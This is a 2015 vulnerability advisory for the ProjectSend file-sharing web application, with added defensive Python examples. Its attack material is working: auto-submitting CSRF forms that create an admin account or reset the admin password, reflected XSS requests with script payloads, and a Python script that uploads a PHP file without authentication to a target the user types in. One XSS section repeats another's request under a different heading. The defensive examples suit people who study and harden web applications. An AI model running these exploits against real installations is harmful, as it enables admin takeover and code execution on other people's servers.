• 13 June 2015

    #[+] Author: TUNISIAN CYBER
    #[+] Title: ProjectSend Multiple Vulnerabilities
    #[+] Date: 25-04-2015
    #[+] Vendor: http://www.projectsend.org/
    #[+] Download: http://www.projectsend.org/download/67/
    #[+] Type: WebAPP
    #[+] Tested on: KaliLinux (Debian)
    #[+] Twitter: @TCYB3R

    It's a long one so let's start...

    I/ CSRF: Add Admin

    <html>
    <head>
    <title>ProjectSend CSRF (Add User)</title>
    </head>
    <body>
        <form action="http://192.168.186.129/ProjectSend-r561/users-add.php" method="POST" id="CSRF" style="visibility:hidden">
          <input type="hidden" name="add_user_form_name" value="CSRF OPS" />
          <input type="hidden" name="add_user_form_user" value="TUNISIANCYBER" />
          <input type="hidden" name="add_user_form_pass" value="password" />
          <input type="hidden" name="add_user_form_email" value="pwn3d@csrf.com" />
          <input type="hidden" name="add_user_form_level" value="9" />
          <input type="hidden" name="add_user_form_active" checked="checked" />
        </form>
    <script>
    document.getElementById("CSRF").submit();
    </script>
      </body>
    </html>

    0x0Proof:
    http://i.imgur.com/t77Plve.png

    II/ CSRF: Change Admin Password:
    <html>
    <head>
    <title>ProjectSend CSRF (Change Password)</title>
    </head>
    <body>
        <form action="http://192.168.186.129/ProjectSend-r561/users-edit.php?id=1" method="POST" id="CSRF" style="visibility:hidden">
          <input type="hidden" name="add_user_form_name" value="User changed" />
          <input type="hidden" name="add_user_form_user" value="admin" />
          <input type="hidden" name="add_user_form_pass" value="password" />
          <input type="hidden" name="add_user_form_email" value="newemail@opss.net" />
          <input type="hidden" name="add_user_form_level" value="9" />
          <input type="hidden" name="add_user_form_active" checked="checked" />
        </form>
    <script>
    document.getElementById("CSRF").submit();
    </script>
      </body>
    </html>
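    Both forms above work for one reason: the victim's browser attaches the ProjectSend session cookie to a POST no matter which page built the form, and users-add.php / users-edit.php accept the cookie as the only proof of intent. The following is an added example (not ProjectSend's code and not part of the advisory) of the two checks that close that gap: a synchronizer token bound to the session and an Origin/Referer check. `SERVER_SECRET`, the `csrf_token` field name, the request dictionaries and the attacker host are assumptions constructed for the demonstration; the session id and form fields are taken from the requests in the advisory.

```python
import hmac
import hashlib
from urllib.parse import urlparse

# Assumptions (not from the advisory): a per-deployment secret kept server-side,
# and the origin a browser reports for the host used in the advisory.
SERVER_SECRET = b"replace-with-a-long-random-secret"
SITE_ORIGIN = "http://192.168.186.129"


def issue_csrf_token(session_id):
    """Synchronizer token bound to the session: HMAC(secret, session id).

    Embedded as a hidden field in the real users-add/users-edit forms. A page on
    another origin cannot read it, so a forged form cannot include it.
    """
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def request_origin(headers):
    """Origin the browser attached (Origin header, else scheme+host of the Referer)."""
    origin = headers.get("Origin")
    if origin:
        return origin.rstrip("/")
    referer = headers.get("Referer")
    if referer:
        parts = urlparse(referer)
        if parts.scheme and parts.netloc:
            return "%s://%s" % (parts.scheme, parts.netloc)
    return None


def check_state_change(request):
    """Gate for a POST that creates or edits a user.

    request = {"headers": {...}, "cookies": {...}, "form": {...}}.
    The session cookie alone never authorises the change: the browser sends it
    automatically, which is exactly what the forged forms rely on.
    """
    session_id = request["cookies"].get("PHPSESSID")
    if not session_id:
        return False, "no session"
    origin = request_origin(request["headers"])
    if origin != SITE_ORIGIN:
        return False, "cross-origin request from %r" % origin
    submitted = request["form"].get("csrf_token", "")
    expected = issue_csrf_token(session_id)
    # Constant-time comparison; both sides as bytes so any submitted string is accepted as input.
    if not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False, "missing or invalid csrf token"
    return True, "ok"


# Constructed: what the "Add Admin" form produces when the victim's browser submits
# it from a page hosted elsewhere. The session cookie rides along, but neither the
# token nor a same-site Origin is present.
FORGED_ADD_ADMIN = {
    "headers": {"Origin": "http://attacker.invalid",
                "Referer": "http://attacker.invalid/csrf.html"},
    "cookies": {"PHPSESSID": "6i46fls4587ntmn8juo70nl9u7"},
    "form": {"add_user_form_name": "CSRF OPS", "add_user_form_user": "TUNISIANCYBER",
             "add_user_form_pass": "password", "add_user_form_level": "9"},
}


def legitimate_add_user(session_id, origin_header=True):
    """Constructed: the same form submitted from the application's own users-add page."""
    if origin_header:
        headers = {"Origin": SITE_ORIGIN}
    else:
        headers = {"Referer": SITE_ORIGIN + "/users-add.php"}
    return {
        "headers": headers,
        "cookies": {"PHPSESSID": session_id},
        "form": {"add_user_form_user": "alice", "add_user_form_level": "9",
                 "csrf_token": issue_csrf_token(session_id)},
    }


if __name__ == "__main__":
    print(check_state_change(FORGED_ADD_ADMIN))
    print(check_state_change(legitimate_add_user("6i46fls4587ntmn8juo70nl9u7")))
```

    The token check is the one that must not be skipped: the Origin check is cheap and catches the forged submission early, but older browsers and some proxies omit both Origin and Referer, so a deployment that relies on it alone would have to decide whether to reject header-less requests.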

    III/ XSS_1 (index.php):
    Host: 192.168.186.129
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 78

    0x0Proof:
    http://i.imgur.com/TDfFDU3.png

    IV/ XSS_2 (clients.php):
    http://192.168.186.129/ProjectSend-r561/clients.php

    POST /ProjectSend-r561/clients.php HTTP/1.1
    Host: 192.168.186.129
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 64
    search=%22%3E%3Cscript%3Ealert%28%220000%22%29%3B%3C%2Fscript%3E
    HTTP/1.1 200 OK
    Date: Sat, 25 Apr 2015 21:15:13 GMT
    Server: Apache/2.2.22 (Debian)
    X-Powered-By: PHP/5.4.39-0+deb7u2
    Expires: Sat, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Pragma: no-cache
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 2851
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html

    0x0Proof:
    http://i.imgur.com/ywf8JdF.png

    V/XSS_3 (actions-log.php)
    http://192.168.186.129/ProjectSend-r561/clients.php

    POST /ProjectSend-r561/clients.php HTTP/1.1
    Host: 192.168.186.129
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 64
    search=%22%3E%3Cscript%3Ealert%28%220000%22%29%3B%3C%2Fscript%3E
    HTTP/1.1 200 OK
    Date: Sat, 25 Apr 2015 21:15:13 GMT
    Server: Apache/2.2.22 (Debian)
    X-Powered-By: PHP/5.4.39-0+deb7u2
    Expires: Sat, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Pragma: no-cache
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 2851
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html

    0x0Proof:
    http://i.imgur.com/cVKIhj3.png

    VI/ File Upload:
    (Exploit originally found by Fady Mohamed Osman)

    Rewritten by TUNISIAN CYBER

    #!/usr/bin/env python
    # Python 2 (print statement, raw_input)
    import requests

    print "+---------------------------------------+"
    print "| ProjectSend File Upload Vulnerability |"
    print "+---------------------------------------+"

    vuln = raw_input('Vulnerable Site:')   # base URL of the install, without trailing slash
    fname = raw_input('EvilFile:')         # file name, written locally and then uploaded

    # Write the test file locally, then POST it to process-upload.php,
    # which stores it under upload/files/ using the client-supplied name.
    with open(fname, 'w') as fout:
        fout.write("<?php phpinfo() ?>")
    url = vuln + '/process-upload.php' + '?name=' + fname
    with open(fname, 'rb') as fin:
        result = requests.post(url, files={'file': fin})
    print "===> " + vuln + "/upload/files/" + fname
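    The script above sends no session, picks the stored file name itself through the `name` parameter, and uploads PHP source that the web server then executes from upload/files/. The following is an added example (not ProjectSend's code and not part of the advisory) of the server-side decision an upload handler should make instead: require an authenticated user, derive the stored name from an allow-listed extension with a random stem, and inspect the bytes for a PHP open tag whatever the name says. `ALLOWED_EXTENSIONS`, the `session_user` parameter and the sample inputs are assumptions constructed for the demonstration.

```python
import os
import re
import secrets

# Assumption (not from ProjectSend): the document types this deployment accepts.
ALLOWED_EXTENSIONS = {"pdf", "png", "jpg", "jpeg", "gif", "txt", "zip", "docx"}
# A PHP open tag anywhere in the leading bytes, regardless of the file's name.
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def storage_name(client_name):
    """Server-chosen file name: keeps only an allow-listed extension, discards the rest.

    Path separators and '..' in the client-supplied name never reach the filesystem,
    and the random stem means the stored file's URL cannot be predicted from the upload.
    Returns None when the extension is not allowed.
    """
    base = os.path.basename(client_name.replace("\\", "/"))
    ext = base.rsplit(".", 1)[1].lower() if "." in base else ""
    if ext not in ALLOWED_EXTENSIONS:
        return None
    return "%s.%s" % (secrets.token_hex(16), ext)


def accept_upload(session_user, client_name, content):
    """Decision for one multipart upload; returns (accepted, reason_or_storage_name).

    session_user is the authenticated user from the server-side session, or None.
    The order matters: reject anonymous callers before touching the file at all.
    """
    if session_user is None:
        return False, "unauthenticated"
    name = storage_name(client_name)
    if name is None:
        return False, "extension not allowed"
    # A double extension such as info.php.txt passes the allow-list; the content check
    # still catches it. Only the head of the file is scanned to bound the cost.
    if PHP_OPEN_TAG.search(content[:8192]):
        return False, "server-side code in upload body"
    return True, name


if __name__ == "__main__":
    # Constructed inputs: the payload the advisory's script writes, and an ordinary document.
    print(accept_upload(None, "info.php", b"<?php phpinfo() ?>"))
    print(accept_upload("admin", "info.php", b"<?php phpinfo() ?>"))
    print(accept_upload("admin", "info.php.txt", b"<?php phpinfo() ?>"))
    print(accept_upload("admin", "../../report.pdf", b"%PDF-1.4 constructed"))
```

    The content check is a last line, not the first: the upload directory should also be served with script execution disabled, so that a file which slips through every check above is still returned as bytes rather than run.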




    Source: http://www.sec4ever.com
